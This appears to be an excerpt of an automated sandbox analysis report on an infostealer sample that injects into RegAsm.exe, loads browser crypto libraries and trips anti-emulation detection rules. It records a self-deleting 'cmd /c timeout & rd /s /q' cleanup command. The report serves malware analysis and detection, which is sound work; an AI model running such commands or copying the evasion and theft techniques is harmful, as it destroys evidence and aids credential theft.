                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70D320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7353C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C836C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C806D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8FCDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C774DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C850E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80EE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DEF40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C776F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C770FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C832F70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C0820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FA820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8768E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C844840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7A8960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8009A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8309B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C88C9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C6900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7A49F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7ECA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C81EA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C828A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C876BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C778BAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89A480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C788460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FA430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80A4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B64D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D2560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C8540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83A5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FE5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7645B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C874540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CC650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7946D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C79A7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7BE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84C0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83C000
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 006E7D60 appears 53 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C793620 appears 44 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8F09D0 appears 173 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C799B10 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7094D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8FDAE0 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8FD930 appears 33 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C6FCBE8 appears 134 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/25@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: .o
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
